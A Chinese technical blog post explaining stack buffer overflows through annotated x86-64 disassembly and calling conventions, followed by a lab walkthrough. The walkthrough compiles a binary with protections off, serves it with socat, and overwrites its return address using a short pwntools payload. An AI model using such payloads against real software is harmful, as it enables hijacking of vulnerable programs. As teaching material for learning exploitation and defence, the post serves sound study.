缓冲区溢出原理及举例

原创 已于 2025-10-05 10:42:37 修改 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2014-12-15 06:40:04 首次发布
本文探讨了栈溢出及缓冲区溢出的基本原理,包括ebp与esp指针的作用,以及不同类型的溢出模式。文章还提供了多个参考资料,帮助读者深入理解并学习如何防范这些安全威胁。

(1)栈溢出原理

基本原理:一是ebp指向栈底元素;esp 指向栈顶元素(存在数据的那个栈空间)。二是栈从高地址向低地址减少。三是小端是数值的高字节存高地址,数值的低字节存低地址。四是数组的地址依次增加则地址依次增加。

函数调用方式:三种_fastcall(ECX/EDX传递前两个参数 ,剩下的从右往左依次入栈,函数自己处理,linux默认方式) :_stdcall(WINAPI,函数自己处理释放)_cdecl(谁调用谁释放)

_fastcall栈操作的基本步骤:一是把当前系统的rbp压入栈,将main的rep和rsp指向同一个位置,然后rsp减去某数值,构建main的变量空间。二是main函数内有其他函数add()调用则需要先将add()函数下一条命令压入栈,然后将main函数的rbp压入栈,add()的rep和rsp指向同一个位置,然后rsp减去某数值,构建add函数的变量空间。

案例一栈工作原理:

.text:00005556CC538139 var_11= dword ptr -11h

.text:00005556CC538139 var_D= dword ptr -0Dh

.text:00005556CC538139 var_9= byte ptr -9

.text:00005556CC538139 var_8= dword ptr -8

.text:00005556CC538139 var_4= dword ptr -4

.text:00005556CC538139 push    rbp

#将rbp的地址压入栈中,其中rbp是调用操作系统的基址,8个字节。(rbp=0001)

.text:00005556CC53813A mov     rbp, rsp

#将rsp的地址赋值给rbp,此时rbp存的是main函数的基址(rbp=00007FFE89FB97E0)。

.text:00005556CC53813D sub     rsp, 20h

#将main函数的栈空间扩充32个字符空间(rsp=0x00007FFE89FB97C0)

.text:00005556CC538141 mov     [rbp+var_D], 64636261h

#为数组分配空间按a在最低字节,d在最高字节,其中最低空间是rbp-17个字节

#rbp+var_D=00007FFE89FB97D3开始依次放入

.text:00005556CC538148 mov     [rbp+var_9], 65h ; 'e'

.text:00005556CC53814C mov     [rbp+var_11], 34333231h

#C数值分配比a更小

.text:00005556CC538153 mov     [rbp+var_4], 6

.text:00005556CC53815A mov     [rbp+var_8], 7788h

.text:00005556CC538161 lea     rax, [rbp+var_D]

.text:00005556CC538165 mov     rsi, rax

.text:00005556CC538168 lea     rax, format     ; "%s"

.text:00005556CC53816F mov     rdi, rax        ; format

.text:00005556CC538172 mov     eax, 0

.text:00005556CC538177 call    _printf

案例二远程栈溢出基本利用。

#系统上将程序转发到10001端口
socat tcp-listen:10001,reuseaddr,fork EXEC:./yl10,pty,rawer
#检查程序防护情况
checksec --file=./yl10                                       
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   36 Symbols        No    0               2           ./yl10
#关闭防护
gcc -z execstack -fno-stack-protector -no-pie -o yl10 sfast.c
#python 链接端口发送数据
from pwn import *
p=remote('192.168.248.128',10001)
payload=b'A'*14+p64(0x401136+1)
#'A'*6+'A'*8+p64(0x401136+1) ===6个字符+main函数的rbp8个字节+函数地址,函数地址来源于IDA静态分析
p.sendline(payload)
print(p.recv())

案例三 IDA +远程linux程序调试:

WINDOWS上IDA通过linux_sever64程序对linux程序进行动态调试,详细过程看https://blog.youkuaiyun.com/chelp/article/details/24341425

案例四socat+pwntools+IDA+远程linux程序调试

一:IDA配置调试断点

二:设置端口转发,访问端口则执行程序

三、利用pwntools导入python库然后链接端口,启动程序

四、debuger调试将程序添加到IDA调试环境

五、pwntools交互调试即可

(2)堆溢出原理

chelp
关注
缓冲区溢出原理
一杯水果茶!足矣~
12-05 1522
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出
缓冲区溢出攻击示例
qq_67812668的博客
08-12 1452
缓冲区溢出攻击是利用 缓冲区溢出漏洞 所进行的攻击行动。 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛 存在 。 利用缓冲区溢出攻击,可以导致程序 运行 失败、系统关机、重新启动等后果。 缓冲区 溢出是指当 计算机 向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。 理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。 但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。
缓冲区溢出原理浅析以及防护
06-08 808
【摘要】本文从程序语言本身的缺陷,不够健壮的角度出发,详细分析了缓冲溢出攻击的基本原理,描述了黑客利用缓冲区漏洞进行系统攻击的一般过程,最后又简单讨论了几种防范溢出攻击的策略. 【关键字】缓冲溢出; 程序跳转; 长跳转缓冲区; 近些年来,黑客攻击事件频繁发生,尤其是缓冲区溢出漏洞攻击占据了网络远程攻击的绝大多数. 因为这类攻击可以使任何人获得系统主机的完全控制权,所以它代表了一类十
JavaScript 缓冲区详解:溢出原理与防御策略
最新发布
我是 二川兄,对Web开发、GIS开发、3D模型、机器学习、面试技巧等方面都有一些涉猎~ 欢迎您加入技术交流圈!你可以在我的文章末尾找到我~
05-14 1139
JavaScript 缓冲区详解:溢出原理与防御策略
缓冲区溢出***与防御
weixin_34268753的博客
08-11 268
缓冲区溢出***是一个技巧性非常强的***方法,面对的是一个漏洞.破坏的是程序的堆栈. 在内存中,程序运行的时候,会动态分配大量内存给动态变量,如果分配完动态变量的内存,放入的却是超出分配给他的内存大小的时候,它就会溢出.可以这样说,溢出发生在缓冲区分配给变量的内存中.程序的数据段是产生溢出的根源,因为动态的数据是存在堆...
缓冲区溢出攻击的原理分析及防范
qq_57335073的博客
05-16 3109
缓冲区攻击原理及示例
缓冲区溢出原理及防护(05年第六期)
09-04 2014
中科院研究生院  蒋 涛   摘    要   本文详细分析了缓冲区溢出原理,描述了网络攻击者利用缓冲区溢出漏洞进行系统攻击的一般过程,最后简单讨论了几种缓冲区溢出的保护方法。关键词 缓冲区溢出  缓冲区溢出漏洞      安全攻击        缓冲区溢出保护        在过去的十年中,以缓冲区溢出为攻击类型的安全漏洞是最为常见的一种形式。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大
缓冲区溢出攻击原理实例
08-17
**缓冲区溢出攻击原理与实例** 缓冲区溢出攻击是一种常见的网络安全威胁,它利用了程序处理内存时的疏忽,尤其是当程序没有正确检查输入数据的大小时。这种攻击通常发生在程序尝试将数据写入固定大小的内存区域(即...
游戏安全03:缓冲区溢出攻击简单解释
谢白羽
07-31 4853
借助汇编解释代码举例
深度解析:C语言中缓冲区溢出的预防与检测策略
power_9的博客
10-21 1058
缓冲区溢出是一个严重的安全问题,它可能导致程序崩溃、数据泄露甚至系统被攻击。通过采用上述预防策略,如输入验证、使用安全的字符串内存函数、静态代码分析、代码审查以及利用现代C语言特性,可以有效地减少缓冲区溢出的风险。随着编程语言工具的不断发展,开发者应该持续学习适应新的安全实践,以保护软件免受这类漏洞的威胁。
缓冲区溢出攻击原理、方法及防范(一)
weixin_46663238的博客
07-15 5759
由于C/C++语言本身没有数组越界检查机制,当向缓冲区里写入的数据超过了为其分配的大小时,就会发生缓冲区溢出。 攻击者可以利用缓冲区溢出来窜改进程运行时栈,从而改变程序的正常流向。在分析缓冲区溢出攻击的原理之前,我们先来 复习一下进程在内存中的结构。 进程在内存中的组织形式 Text段主要包含程序代码(一系列可执行的指令),另外还有一些只读的数据。通常操作系统标记该段为只读段, 如果有进程试图修改该段,会引发段错误。 Data段包括已初始化未初始化的全局变量,静态变量也放于...
【计算机系统】缓冲区溢出攻击概念、演示及防御
热门推荐
obstacle19的博客
04-12 1万+
是一种常见的安全漏洞,也被称为缓冲区溢出。它发生在程序尝试向缓冲区写入数据时,。这种溢出可能破坏程序的堆栈,使程序转而执行其它指令,从而达到攻击的目的。缓冲区溢出攻击的原理主要是利用程序中存在的缓冲区溢出漏洞。当程序没有仔细检查用户输入的参数时,攻击者可以通过输入超出缓冲区边界的恶意数据来破坏程序的正常执行流程。这些数据可以,导致程序。例如,在一个简单的C语言程序中,如果程序使用固定大小的缓冲区来接收用户输入,而攻击者输入的数据超过该缓冲区的容量,就会发生缓冲区溢出
缓冲区溢出攻击及防御技术
__52Hz__
07-29 1993
http://wenku.baidu.com/view/ef68b54f33687e21af45a92a.html
缓存区溢出原理分析防范
m0_57313444的博客
05-22 5536
缓冲区溢出(buffer-overflow)是一种非常普遍、同时非常危险的漏洞,在各种操作系统、应用软件中广泛存在。
缓冲区溢出深度防御体系
Enjoy life with sun
05-26 1130
  谈及防御之前 ------------ 首先简要回顾一下缓冲区溢出的攻击大系: ◆栈溢出(stack smashing) 未检查输入缓冲区长度,导致数组越界,覆盖栈中局部变量空间之上的栈桢指针%ebp以及函数返回地址retaddr, 当函数返回执行ret指令时,retaddr从栈中弹出,作为下一条指令的地址赋给%eip寄存器,继而改变原程序的执 行流程指向我们的shellcode. ◆堆溢
缓冲区溢出攻击
weixin_33720956的博客
08-10 602
缓冲区溢出攻击   缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典而又古老的话题。随着计算机系统安全性的加强,传统的缓冲区溢出攻击方式可能变得不再奏效,相应的介绍缓冲区溢出原理的资料也变得“大众化”起来。其中看雪的《0day安全:软件漏洞分析技术》一书将缓冲区溢出攻击的原理阐述得简洁明了。本文参考该书对缓冲区溢出原理的讲解,并结合实际的代码实例进行验证。不过即便如此,完成...
缓冲区溢出原理
weixin_45007073的博客
05-07 5185
0x00 缓冲区溢出概念 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患,操作系统所使用的缓冲区,又被称为"堆栈"。在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出。 0x01 缓冲区溢出原理 程序员通过往程序的缓冲区写超出其长度的内容,造成缓冲区溢出,从而破坏程序的堆栈,使程序
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值